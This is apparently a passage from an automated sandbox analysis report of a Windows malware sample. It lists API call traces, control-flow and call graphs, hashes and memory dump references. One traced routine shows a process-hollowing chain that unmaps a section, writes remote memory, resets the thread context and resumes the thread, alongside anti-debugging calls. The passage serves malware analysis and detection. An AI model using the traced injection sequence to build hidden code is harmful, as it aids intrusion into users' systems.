                                                                                                                                                                                                                                                                                                                                  • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0289029F
                                                                                                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 028902C8
                                                                                                                                                                                                                                                                                                                                  • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 028902E3
                                                                                                                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02890304
                                                                                                                                                                                                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0289032A
                                                                                                                                                                                                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02890399
                                                                                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 028903BF
                                                                                                                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 028903E1
                                                                                                                                                                                                                                                                                                                                  • ResumeThread.KERNELBASE(00000000), ref: 028903ED
                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 02890412
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.1999659165.0000000002890000.00000040.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_2890000_8F78.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 93872480-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0294f886cf1a2084f29f8703e59a98cc37333a28ec8d33d8397ab6e08da3fc0c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EB1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AE41CF94
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 15 2890420-28904f8 17 28904fa 15->17 18 28904ff-289053c CreateWindowExA 15->18 19 28905aa-28905ad 17->19 20 289053e 18->20 21 2890540-2890558 PostMessageA 18->21 20->19 22 289055f-2890563 21->22 22->19 23 2890565-2890579 22->23 23->19 25 289057b-2890582 23->25 26 28905a8 25->26 27 2890584-2890588 25->27 26->22 27->26 28 289058a-2890591 27->28 28->26 29 2890593-2890597 call 2890110 28->29 31 289059c-28905a5 29->31 31->26
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02890533
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.1999659165.0000000002890000.00000040.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_2890000_8F78.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                                                                                                                                                                                                  • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                                                                                                                                                                                                  • API String ID: 716092398-2341455598
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2458e9f3513b64f55b025076002fb9e51dc66c05e4c429ed261abec4b3edf252
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07511874D08388DAEF11CBE8C849BDDBFB2AF11708F184058D5487F286C3BA5658CB66
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 32 28905b0-28905d5 33 28905dc-28905e0 32->33 34 289061e-2890621 33->34 35 28905e2-28905f5 GetFileAttributesA 33->35 36 2890613-289061c 35->36 37 28905f7-28905fe 35->37 36->33 37->36 38 2890600-289060b call 2890420 37->38 40 2890610 38->40 40->36
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNELBASE(apfHQ), ref: 028905EC
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.1999659165.0000000002890000.00000040.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_2890000_8F78.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                  • String ID: apfHQ$o
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3188754299-2999369273
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 01040ca9e9d34f27e9095028d777eb8877f0e219a2c5f3c3cff041993597c22c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91011E74D0425CEADF11DBD8C5183AEBFB5AF41309F18809DC4496B242D7769B58CBA2
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 41 26ce7c6-26ce7df 42 26ce7e1-26ce7e3 41->42 43 26ce7ea-26ce7f6 CreateToolhelp32Snapshot 42->43 44 26ce7e5 42->44 45 26ce7f8-26ce7fe 43->45 46 26ce806-26ce813 Module32First 43->46 44->43 45->46 52 26ce800-26ce804 45->52 47 26ce81c-26ce824 46->47 48 26ce815-26ce816 call 26ce485 46->48 53 26ce81b 48->53 52->42 52->46 53->47
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 026CE7EE
                                                                                                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 026CE80E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.1999543598.00000000026CE000.00000040.00000020.00020000.00000000.sdmp, Offset: 026CE000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_26ce000_8F78.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 20a9b9daa13a357ceaf20c6fc3c2429b8ce9523f504bdcbc909dc283ccd77dea
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9F096322017106FD7303BF5A88DBBE76F8EF49629F20052DF642D25C0DB71E8458A61
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 54 26ce485-26ce4bf call 26ce798 57 26ce50d 54->57 58 26ce4c1-26ce4f4 VirtualAlloc call 26ce512 54->58 57->57 60 26ce4f9-26ce50b 58->60 60->57
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 026CE4D6
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.1999543598.00000000026CE000.00000040.00000020.00020000.00000000.sdmp, Offset: 026CE000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_26ce000_8F78.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f26e8c307e078a8950658db91fde13fda94c493f58389d6e854f03c1535d13a6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD112D79A00208EFDB01DF98C985E99BBF5EF08350F158094F9489B361D375EA50DF94
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                  Execution Coverage:15.6%
                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                  Signature Coverage:22.2%
                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:27
                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:0

                                                                                                                                                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                                                                                                                                                  callgraph 0 Function_006A1E69 1 Function_006949ED 2 Function_006970EC 37 Function_0069592F 2->37 3 Function_006957EE 62 Function_0069571F 3->62 4 Function_0069C2EE 5 Function_006943E0 8 Function_00694A78 5->8 14 Function_00696948 5->14 25 Function_00696950 5->25 6 Function_006C5FE7 6->2 30 Function_00696254 6->30 32 Function_006959A8 6->32 35 Function_006C5FAA 6->35 7 Function_0069E662 8->14 9 Function_00699BFC 12 Function_00695DF0 9->12 10 Function_0069C1FC 10->0 49 Function_006A1E88 10->49 11 Function_00695AF1 11->62 13 Function_00695848 27 Function_0069B255 13->27 13->30 41 Function_00695926 13->41 58 Function_00696299 13->58 61 Function_0069591D 13->61 64 Function_00696610 13->64 15 Function_0069CF4A 16 Function_00699BCC 17 Function_0069C34F 18 Function_0069C4C0 19 Function_00696640 34 Function_00696CAD 19->34 54 Function_00696B02 19->54 19->62 20 Function_0069D2C2 36 Function_00694A2F 20->36 38 Function_0069452F 20->38 21 Function_00694A42 21->37 22 Function_006951D9 23 Function_00694ADD 44 Function_00699ABF 23->44 24 Function_006950D0 39 Function_0069CFA1 25->39 26 Function_0069C550 26->18 53 Function_0069C500 26->53 28 Function_00696155 28->36 28->38 29 Function_00694A55 29->1 29->21 29->36 31 Function_0069C3D6 31->31 32->19 32->37 33 Function_006C6028 33->3 33->6 33->13 33->26 33->29 33->32 33->33 33->36 33->38 43 Function_006957BA 33->43 48 Function_006957B4 33->48 52 Function_00696481 33->52 56 Function_00694A87 33->56 60 Function_0069579A 33->60 34->20 34->54 35->2 35->11 35->26 35->30 35->32 35->35 35->37 36->37 37->13 37->43 37->52 37->56 37->62 38->14 38->62 39->39 40 Function_006956A4 40->64 41->44 42 Function_0069C338 42->10 43->62 45 Function_0069D030 45->40 45->62 65 Function_00695716 45->65 46 Function_006962B0 46->4 46->8 46->26 46->42 55 Function_0069C305 46->55 63 Function_0069C31E 46->63 47 Function_0069C333 50 Function_0069D20D 50->36 50->38 51 Function_0069C28C 51->8 51->10 54->5 54->20 54->24 54->28 54->45 54->50 59 Function_0069D199 54->59 55->0 56->1 56->9 56->16 56->23 56->30 56->36 56->58 57 Function_0069B707 57->22 57->30 57->58 59->36 59->38 61->44 62->64 65->40

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 00694AB0
                                                                                                                                                                                                                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 00694ABF
                                                                                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?,0081B8C0,0000000C,00695999,00000000,?,?,006959B0,?,006C5FF8,0081C690,0000000C,006C60AA,?,00000000), ref: 00694AEF
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,006959B0,?,006C5FF8,0081C690,0000000C,006C60AA,?,00000000), ref: 00694B00
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3523875772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3523875772.0000000000824000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3523875772.0000000000843000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_8F78.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2661975262-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 78909d6c4936e91804b8b1daa8b3149c3f077c8927f69aac5a87e0b9846f729e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d2f168f1c234fbc1eb0db84b56c896eb6ac808ee96d716f7e41c0537d1ba3495
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78909d6c4936e91804b8b1daa8b3149c3f077c8927f69aac5a87e0b9846f729e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E501A271945301AADF60BF74AC06F9F3B6EAF00765F10000DF510A6A99CE788A42DA68
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 26 6c5fe7-6c601b call 696254 call 6959a8 call 6c5faa call 6970ec
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 006C5FF3
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006959A8: __getptd_noexit.LIBCMT ref: 006959AB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006959A8: __amsg_exit.LIBCMT ref: 006959B8
                                                                                                                                                                                                                                                                                                                                  • __endthreadex.LIBCMT ref: 006C6003
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: __IsNonwritableInCurrentImage.LIBCMT ref: 006C5FBD
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: __getptd_noexit.LIBCMT ref: 006C5FCD
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: __freeptd.LIBCMT ref: 006C5FD7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: RtlExitUserThread.NTDLL(?,?,006C6008,00000000), ref: 006C5FE0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: __XcptFilter.LIBCMT ref: 006C6014
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3523875772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3523875772.0000000000824000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3523875772.0000000000843000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_8F78.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadUserXcpt__amsg_exit__endthreadex__freeptd__getptd
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1003287236-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a89283c4aba3c99d0b47ffbdad6a7f8d104b49c00d8e382c7f34c9978f4e5ab4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d5ace2e70bc2d3c52d8088d9385be9d0b72b17dae02ad738aec28fd26f28fbfb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a89283c4aba3c99d0b47ffbdad6a7f8d104b49c00d8e382c7f34c9978f4e5ab4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65E0ECB5954605DFEB58ABA0C806E7E776AEF48311F20404CF1029B6A2CA75A984DF25
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 006999D2
                                                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006999E7
                                                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(006D9C6C), ref: 006999F2
                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00699A0E
                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00699A15
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3523875772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3523875772.0000000000824000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3523875772.0000000000843000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_8F78.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5e4f057abdc76eb51c15de7ff52c5ade2ab544b117bf26ad20e1fd5a877e97fd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dcde4617195335d5d3c577808627ec0208f30a12f7e2c262b8b14ad4a69ab474
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e4f057abdc76eb51c15de7ff52c5ade2ab544b117bf26ad20e1fd5a877e97fd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F021E0B4902305DFCB91DF69FD856447BA9FB88360F10681AF509833A0EFB059828F35
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                  Execution Coverage:10.8%
                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                  Signature Coverage:15.5%
                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:30
                                                                                                                                                                                                                                                                                                                                  execution_graph 17805 7ff6e1b48584 17806 7ff6e1b4859d 17805->17806 17807 7ff6e1b48594 17805->17807 17807->17806 17811 7ff6e1b48094 17807->17811 17812 7ff6e1b480ad 17811->17812 17823 7ff6e1b480a9 17811->17823 17832 7ff6e1b51bac GetEnvironmentStringsW 17812->17832 17815 7ff6e1b480c6 17839 7ff6e1b48214 17815->17839 17816 7ff6e1b480ba 17817 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17816->17817 17817->17823 17820 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17821 7ff6e1b480ed 17820->17821 17822 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17821->17822 17822->17823 17823->17806 17824 7ff6e1b48454 17823->17824 17825 7ff6e1b48477 17824->17825 17830 7ff6e1b4848e 17824->17830 17825->17806 17826 7ff6e1b4dd70 memcpy_s 11 API calls 17826->17830 17827 7ff6e1b48502 17829 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17827->17829 17828 7ff6e1b4e820 MultiByteToWideChar _fread_nolock 17828->17830 17829->17825 17830->17825 17830->17826 17830->17827 17830->17828 17831 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17830->17831 17831->17830 17833 7ff6e1b480b2 17832->17833 17835 7ff6e1b51bd0 17832->17835 17833->17815 17833->17816 17834 7ff6e1b4cafc _fread_nolock 12 API calls 17836 7ff6e1b51c07 memcpy_s 17834->17836 17835->17834 17837 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17836->17837 17838 7ff6e1b51c27 FreeEnvironmentStringsW 17837->17838 17838->17833 17840 7ff6e1b4823c 17839->17840 17841 7ff6e1b4dd70 memcpy_s 11 API calls 17840->17841 17850 7ff6e1b48277 17841->17850 17842 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17843 7ff6e1b480ce 17842->17843 17843->17820 17844 7ff6e1b482f9 17845 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17844->17845 17845->17843 17846 7ff6e1b4dd70 memcpy_s 11 API calls 17846->17850 17847 7ff6e1b482e8 17858 7ff6e1b48330 17847->17858 17848 7ff6e1b4f954 _wfindfirst32i64 37 API calls 17848->17850 17850->17844 17850->17846 17850->17847 17850->17848 17852 7ff6e1b4831c 17850->17852 17855 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17850->17855 17856 7ff6e1b4827f 17850->17856 17854 7ff6e1b49e00 _wfindfirst32i64 17 API calls 17852->17854 17853 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17853->17856 17857 7ff6e1b4832e 17854->17857 17855->17850 17856->17842 17859 7ff6e1b48335 17858->17859 17860 7ff6e1b482f0 17858->17860 17861 7ff6e1b4835e 17859->17861 17862 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17859->17862 17860->17853 17863 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17861->17863 17862->17859 17863->17860 18479 7ff6e1b48a80 18482 7ff6e1b48a00 18479->18482 18489 7ff6e1b4f7b8 EnterCriticalSection 18482->18489 14690 7ff6e1b4e90c 14691 7ff6e1b4eafe 14690->14691 14694 7ff6e1b4e94e _isindst 14690->14694 14742 7ff6e1b44474 14691->14742 14694->14691 14696 7ff6e1b4e9ce _isindst 14694->14696 14711 7ff6e1b553e4 14696->14711 14701 7ff6e1b4eb2a 14754 7ff6e1b49e00 IsProcessorFeaturePresent 14701->14754 14708 7ff6e1b4ea2b 14710 7ff6e1b4eaee 14708->14710 14735 7ff6e1b55428 14708->14735 14745 7ff6e1b3adb0 14710->14745 14712 7ff6e1b553f3 14711->14712 14713 7ff6e1b4e9ec 14711->14713 14758 7ff6e1b4f7b8 EnterCriticalSection 14712->14758 14717 7ff6e1b547e8 14713->14717 14718 7ff6e1b4ea01 14717->14718 14719 7ff6e1b547f1 14717->14719 14718->14701 14723 7ff6e1b54818 14718->14723 14720 7ff6e1b44474 memcpy_s 11 API calls 14719->14720 14721 7ff6e1b547f6 14720->14721 14759 7ff6e1b49de0 14721->14759 14724 7ff6e1b4ea12 14723->14724 14725 7ff6e1b54821 14723->14725 14724->14701 14729 7ff6e1b54848 14724->14729 14726 7ff6e1b44474 memcpy_s 11 API calls 14725->14726 14727 7ff6e1b54826 14726->14727 14728 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 14727->14728 14728->14724 14730 7ff6e1b4ea23 14729->14730 14731 7ff6e1b54851 14729->14731 14730->14701 14730->14708 14732 7ff6e1b44474 memcpy_s 11 API calls 14731->14732 14733 7ff6e1b54856 14732->14733 14734 7ff6e1b49de0 _invalid_parameter_noinfo 37 API calls 14733->14734 14734->14730 14840 7ff6e1b4f7b8 EnterCriticalSection 14735->14840 14841 7ff6e1b4a7c8 GetLastError 14742->14841 14744 7ff6e1b4447d 14744->14710 14746 7ff6e1b3adb9 14745->14746 14747 7ff6e1b3adc4 14746->14747 14748 7ff6e1b3ae70 IsProcessorFeaturePresent 14746->14748 14749 7ff6e1b3ae88 14748->14749 14858 7ff6e1b3b064 RtlCaptureContext 14749->14858 14755 7ff6e1b49e13 14754->14755 14863 7ff6e1b49b14 14755->14863 14761 7ff6e1b49c78 14759->14761 14762 7ff6e1b49ca3 14761->14762 14765 7ff6e1b49d14 14762->14765 14764 7ff6e1b49cca 14773 7ff6e1b49a5c 14765->14773 14768 7ff6e1b49d4f 14768->14764 14771 7ff6e1b49e00 _wfindfirst32i64 17 API calls 14772 7ff6e1b49ddf 14771->14772 14774 7ff6e1b49a78 GetLastError 14773->14774 14775 7ff6e1b49ab3 14773->14775 14776 7ff6e1b49a88 14774->14776 14775->14768 14779 7ff6e1b49ac8 14775->14779 14782 7ff6e1b4a890 14776->14782 14780 7ff6e1b49afc 14779->14780 14781 7ff6e1b49ae4 GetLastError SetLastError 14779->14781 14780->14768 14780->14771 14781->14780 14783 7ff6e1b4a8ca FlsSetValue 14782->14783 14784 7ff6e1b4a8af FlsGetValue 14782->14784 14786 7ff6e1b4a8d7 14783->14786 14788 7ff6e1b49aa3 SetLastError 14783->14788 14785 7ff6e1b4a8c4 14784->14785 14784->14788 14785->14783 14799 7ff6e1b4dd70 14786->14799 14788->14775 14790 7ff6e1b4a904 FlsSetValue 14793 7ff6e1b4a922 14790->14793 14794 7ff6e1b4a910 FlsSetValue 14790->14794 14791 7ff6e1b4a8f4 FlsSetValue 14792 7ff6e1b4a8fd 14791->14792 14806 7ff6e1b49e48 14792->14806 14812 